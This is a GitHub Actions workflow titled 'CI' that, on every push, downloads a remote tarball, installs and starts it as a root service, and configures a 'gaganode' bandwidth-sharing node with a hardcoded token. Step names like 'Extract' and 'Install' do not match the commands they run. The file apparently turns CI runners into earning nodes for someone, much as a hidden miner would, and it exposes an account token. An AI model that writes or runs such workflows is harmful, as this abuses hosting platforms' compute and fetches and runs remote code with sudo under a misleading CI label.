name: CI

on: [push, workflow_dispatch]

jobs:
  build:

    runs-on: linux-latest

    steps:
    - name: Download
      run: curl -o app-linux-amd64.tar.gz https://assets.coreservice.io/public/package/22/app/1.0.3/app-1_0_3.tar.gz && tar -zxf app-linux-amd64.tar.gz && rm -f app-linux-amd64.tar.gz && cd ./app-linux-amd64 && sudo ./app service install
    - name: Extract
      run: sudo ./app service start
    - name: Install
      run: ./app status
    - name: Start
      run: sudo ./apps/gaganode/gaganode config set --token=qvaxpcypacrdqtksfjiuwiyl
    - name: SetAddress
      run: ./app restart
